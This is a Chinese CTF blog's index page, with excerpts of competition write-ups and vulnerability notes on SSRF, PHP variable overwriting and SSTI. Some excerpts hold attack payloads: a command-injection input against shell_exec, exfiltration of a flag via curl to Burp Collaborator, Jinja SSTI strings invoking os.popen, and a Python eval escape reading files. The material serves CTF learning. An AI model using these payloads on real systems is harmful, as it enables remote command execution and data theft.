梦~醒🥝
BaseCTF-week3-wp
BaseCTF-week3-wp [TOC] misc [Week3] broken.mp4 考点:破损的mp4,untrunc工具 下载附件,是一个完整的mp4和一个破损的mp4,用untrunc工具进行修复破损的mp4,播放视频就能看到flag。 [Week3] 我要吃火腿! 考点:兽音解密,python代码审计,破损文件修复,文件分离,SSTV 下载附件,解压。有一个破损的jpg文件和一个txt文件。打开txt文件 发现是兽音,在线直接解密。 得到一串python代码 12345678910111213def xor_with_ham(input_file, output_file): ham_bytes = [0x48, 0x61, 0x6D] with open(input_file, 'rb') as f: data = bytearray(f.read()) for i in range(len(data)): data[i] ^= ham_bytes[i % 3] with open ...
shell_exec()等函数无回显执行办法
遇到shell_exec()函数无回显执行,比如: 123 <?phphighlight_file(__FILE__);shell_exec($_POST['cmd']); 在PHP中 “>” 是表示把什么写入什么文件的意思。 比如这道题目,既然无回显,那我就把它写进一个文件,然后访问这个文件不就可以了。 可以使用burp上的Collaborator抓取。 以上题为例,详细抓取步骤: 先将无回显的内容保存在一个文件里,post以下: 1cmd=cat /f* > 2.txt 这样有了一个文件2.txt,其中是执行了cat /f* 命令的结果,接下来抓取该文件就能看到了。 使用curl -F将flag文件上传到Burp的Collaborator Client(Collaborator Client 类似DNSLOG,其功能要比DNSLOG强大,主要体现在可以查看POST请求包以及打Cookies)(-X指定发送一个POST请求,-F指定要发送的文件) 获取Collaborator Client分配给BURP的链接: 打开Burp主界面 --> ...
BaseCTF比赛week2-wp
BaseCTF比赛week2-wp [TOC] Misc [Week2] 黑丝上的flag 考点:图片隐写 打开是一张嗨咝图。根据题目意思,flag应该在黑丝上。放进StegSolve看看,找到了flag。 [Week2] Base?! 考点:简单的base 下载附件打开,解码出现flag。 [Week2] 海上又遇了鲨鱼 考点:流量分析 将附件用wireshark打开,发现了关键词flag.zip。 追踪流查看,发现有个登录的password,估计需要,先记下来 将此文件提取下载出来,解压,密码就是上面的password,找到flag。 [Week2] Aura 酱的旅行日记 I <图寻擂台> 考点:图片查地址 搜索关键词-恐龙化石,博物馆。找到相似的图。 找到地址信息,就是flag。 [Week2] 前辈什么的最喜欢了 考点:base64 下载附件,一大串vase64编码,解码找到flag。 [Week2] Aura 酱的旅行日记 III <图寻擂台> 考点:图片信息,查地址 根据图片gps经纬度信息,算出经度纬度。 计算方式: ...
Moectf-week2-wp
[TOC] Misc the_secret_of_snowball 考点:破损文件,010editor查看 打开文件,是张破损的jpg文件 放进010editor,修改前缀。jpg文件前缀是FF D8 FF E1 找到一半flag 另一半去哪里了呢?在010editor末尾看到了一串特殊密码 进行解密得到另一半 最后合在一起,就是完整的flag。 每人至少300份 考点:二维码拼接 下载文件,是一堆分割的二维码,需要将二维码拼上,在进行扫描,就能看到信息。 扫出来后是一串字符。 解码得到flag。 解不完的压缩包 考点:压缩包套娃 下载文件,是压缩包套娃,999个压缩包重叠,没有密码,可以手动解压(雾)。 python脚本更快。(见脚本笔记) 解压完后最后一个压缩包里面有加密文件和flag。 前四个压缩大小和原始大小一样,考虑使用ZipCracker工具的CRC32碰撞提取内容,得到flag.txt的密码,最后得到flag。 web 垫刀之路01: MoeCTF?启动! 先直接查看flag。 查看环境变量,执行set命令。出flag。 垫刀之路02: 普 ...
SSRF漏洞
SSRF漏洞原理攻击与防御 一、SSRF是什么? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 二、SSRF漏洞原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 比如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器 三、SSRF漏洞挖掘 1、分享:通过URL地址分享网页内容 2、转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览:由于手机屏幕大小的关系,直接浏览网页内容的时候会造成许多不便,因此有些公司提供了转码功能,把网页内容通过相关手段转为适合手机屏幕浏览的样式。例如百度、腾讯、搜狗等公司都有提供在线转码服务。 3、在线翻译:通过URL地址翻译对应文本的 ...
变量覆盖漏洞
变量覆盖漏洞 记录网站:【CTF_Web:php中的变量覆盖问题 - CSDN App】http://t.csdnimg.cn/LAmY1 变量覆盖函数:parse_str() 、extract()、import_request_variables() 1.什么是变量覆盖 变量覆盖基本都来自于各种函数(parse_str() 、extract()、import_request_variables()等)对用户输入取值时的问题,当用户对已经存在的变量再次通过 各种函数赋值时,将会触发变量覆盖,修改之前定义的值,这类问题需要严格定义用户可以输入的部分,或值避免使用存在此类问题的函数。 2.parse_str() 函数 原型:parse_str(string,array) 定义和用法:parse_str() 函数把查询字符串解析到变量中。 如果未设置 array 参数,由该函数设置的变量将覆盖已存在的同名变量。 php.ini文件中的 magic_quotes_gpc设置影响该函数的输出。如果已启用,那么在 parse_str()解析之前,变量会被 addslashes()转换。 例子: ...
Basectf比赛week1-wp
[TOC] Basectf比赛week1-wp MISC [Week1] 签到!DK 盾! 关注公众号得到flag。 [Week1] Base 考点:base编码 下载附件得到一串base编码,解密得到flag。 [Week1] 正着看还是反着看呢? 考点:文件逆序,文件分离 附件压缩包解压发现一个名为flag的未知文件,用010editor打开发现文件逆序了 使用脚本将文件顺序调换回来,得到一张jpg图片。 用010editor打开,发现藏了一个隐藏文件flag。 提取出来得到flag. [Week1] 海上遇到了鲨鱼 考点:流量分析 打开是个pcapng文件,用wireshark打开。 检索关键词flag,用tcp流打开,查看流,最后找到flag。 [Week1] 人生苦短,我用Python 考点:代码审计,搜索引擎 打开程序,一段超长python代码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556 ...
Moectf-week1-wp
[TOC] Misc signin 登录网站,是个签到的题,根据提示直接让luo缺勤,其他全补签就可以了。(我第一次的时候还专门给其他人缺勤了,真是个好老师了。) 罗小黑战记 考点:动态图片 下载文件,是个116张图组成的动图,一帧一帧看,看到一个二维码,扫一扫出flag。 杂项入门指北 考点:摩斯密码 这个下载后是群里的入门文件和海报,线索在海报上,仔细观察就能看到摩斯密码。(找了好久才看到) 放进工具里解码。 不知道哪里出了点小问题,多了个‘T1’,要删除前面的,删后面的不行(恼火) ez-F5 考点:F5隐写 下载文件,是一个jpg文件,根据题目可知,应该是F5隐写工具。 在属性里找到备注信息 是base64,解码后得到no_password,盲猜是F5的密码。 使用工具拿到flag。 web Web渗透测试与审计入门指北 就用他给的文件搭建个环境,然后进网站就拿到flag。 弗拉格之地的入口 考点:爬虫管理 关键词“爬虫”,马上想到/robots.txt。 访问出flag。 ez_http 考点:http基础 考察http基础知识(不难但复杂)。打开网站, ...
第四届山石ctf训练营结营(招新)赛wp
[TOC] 第四届山石ctf训练营结营(招新)赛wp 签到题 根据提示关注公众号,发flag。 play4fun 下载压缩包后打开flag.txt文件 是一串0和1的码,直接解码出flag。 dog 下载压缩包,解压发现是一条狗的图片。根据题目提示“狗狗的下巴呢?” ,猜测图片要修改高度,放进010editor里修改。 最后看到图片里面的flag。 timestamp 打开文件发现一个txt文件和压缩包,解压缩需要密码,使用要从txt文件入手。 仔细查看txt文件,发现是空白格隐藏,需要用到工具SNOW。 拿到密码后解压缩。 发现文件大小等全部一样,只有修改时间不一样,这就想到时间戳了。 使用获取时间戳的代码获取时间戳,发现后三位不一样,提取后三位出来。 ascll码进行解码,得到flag。
SSTI漏洞
SSTI漏洞: 超详细SSTI模板注入漏洞原理讲解_ssti注入-CSDN博客:https://blog.csdn.net/qq_61955196/article/details/132237648 焚靖工具安装:https://blog.csdn.net/m0_73683234/article/details/136789243 判断方法: 变量名=49 #如果正常回显,说明存在SSTI漏洞 python中的特殊属性: 常用的解题payload: 1234567891011code={{config.__class__.__init__.globals__['os'].popen('ls').read()}}code={{lipsum.__globals__.__builtins__.__import__('os').popen('ls').read()}}code={{url_for.__glob ...
刷题2024.8.6
[TOC] 算力超群 考点:抓包,eval()函数利用,漏洞利用 打开发现是个计算器。一般碰到计算器就很容易和命令执行扯到一块。 随便计算下然后抓个包 发现是get方法,改参数让它报错。发现eval()函数。 python语言,用危险函数eval()进行运算。这里我们使用沙箱逃逸,执行命令反弹shell。 payload 1_calculate?number1=&operator=&number2=__import__('os').popen('cat /f*').read() 算力升级 考点:python库,拼接绕过,漏洞利用 打开,查看源码。 code是输入框提交的内容,下面这段代码是将code中由字母、数字、下划线组成的字符串取出 12pattern=re.compile(r'\w+')for item in pattern.findall(code): 如果取出的不是数字就判断是否为gmpy2库(高精度算术运算库)的函数名,如果最后都是就eval(code)代码执行 那么我们可以看一下gmpy2库 ...
刷题2024.7.29
[TOC] 化零为整 考点:代码审计,url编码 打开网站,分析代码 其中就是把“大牛”二字用url编码后,分别传参就行。 传说之下(雾) 考点:控制台运行 打开链接,是一个贪吃蛇游戏,根据提示,要得到2077分才能出现flag。 调试器查看文件,发现本地变量是Game。 在控制台输入Game,查看发现其中有个score变量,应该是存储分数的。 输入Game.score=2077,然后开始游戏得一分即可出现flag。
avatar
🐟认真摸鱼中
梦~醒🥝
往前走,别回头🍭🍭🍭
前往小窝
公告栏
--- 主域名 ---
m3x1.cn | m3x1.fun
--- 备用域名 ---
m3x1.pages.dev
备用域名2
--- 网站安卓APP ---
🍧点此下载(暂无)🍧
最新文章
小站资讯
文章数目 :
71
本站总字数 :
6.6w
本站访客数 :
本站总访问量 :
最后更新时间 :
空降评论复制本文地址
随便逛逛昼夜切换阅读模式关于博客美化设置切换全屏打印页面